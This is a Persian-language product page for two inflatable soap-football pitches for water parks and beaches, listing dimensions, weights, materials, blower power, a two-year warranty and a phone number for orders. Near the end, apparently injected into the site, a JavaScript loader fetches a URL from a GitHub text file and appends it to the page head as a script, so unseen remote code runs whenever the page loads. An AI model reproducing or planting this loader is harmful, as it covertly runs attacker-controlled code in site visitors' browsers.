سازه بادی پارک آبی و سواحل دریایی

سازه بادی پارک آبی و سواحل دریایی

 • سازه بادی پارک ابی در سواحل و پارک بادی می توان استفاده کرد درکنار این اینکه با هوا پر می شود برای کاری بیشتر از اب هم میتوان اسفاده کرد. درباره این محصولات توضیح داده بودیم این دو نوع جا مانده بود.

  زمین فوتبال بادی

  این محصول در دو نوع کف باد و کف پارچه است.

  زمین فوتبال صابونی کف باد

  سازه بادی پارک آبی و سواحل دریایی

  این زمین فوتبال بادی دارای سقف های ارک شکل و توری استفاده میشود زمین ان داری ستون های بادی است. و برای هیجان بیشتر از اب و صابون استفاده میکنند. ابعاد و اندازه این زمین فوتبال بادی در طول 10 متر و عرض 6 دمتر می باشد و ارتفاع ان 4.5 است و وزن این دستگاه 200 کیلو گرم است. جنسی که در این دستگاه به استفاده میشود از پارچه کره ای و نخ ان ترک است. این دستگاه شامل یک دمنده باد می باشد که قدر این دمنده 1.5 اسب است. این دستگاه شامل استاندارد و دو سال گارانتی می باشد. از این سازه بادی می توانید در پارک های آبی استفاده کنید

  زمین فوتبال بادی کف پارچه

  سازه بادی پارک آبی و سواحل دریایی

  این زمین فوتبال بادی دارای سقف توری استفاده زمین ان پارچه ای و ساده است. وبرای هیجان بیشتر از اب و صابون استفاده میکنند. ابعاد و اندازه این زمین فوتبال بادی در طول 20 متر و عرض 10 دمتر می باشد و ارتفاع ان 3.5 است و وزن این دستگاه 450 کیلو گرم است. جنسی که در این دستگاه به استفاده میشود از پارچه کره ای و نخ آن ترک است. این دستگاه شامل یک دمنده باد می باشد که قدر این دمنده 1.5 اسب است. این دستگاه شامل استاندارد و دو سال گارانتی می باشد. از این سازه بادی می توانید در پارک های آبی استفاده کنید.

  برای اطلاعات بیشتر

  برای خرید این سازه ها نیز می توانید با شماره تلفن 09127484573 تماس حاصل نمایید. همچنین جهت خرید می توانید از طریق راه های ارتباطی تلگرام، واتساپ، ایتا و شبکه های اجتماعی دیگر درخواست خود را جهت خرید به پشتیبانی ما ارائه نمایید. از سایت دوم ما نیز دیدن فرمایید.

  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

  امتیاز شما:

  میانگین امتیازات ۵ از ۵
  از مجموع ۱ رای

  دیدگاهتان را بنویسید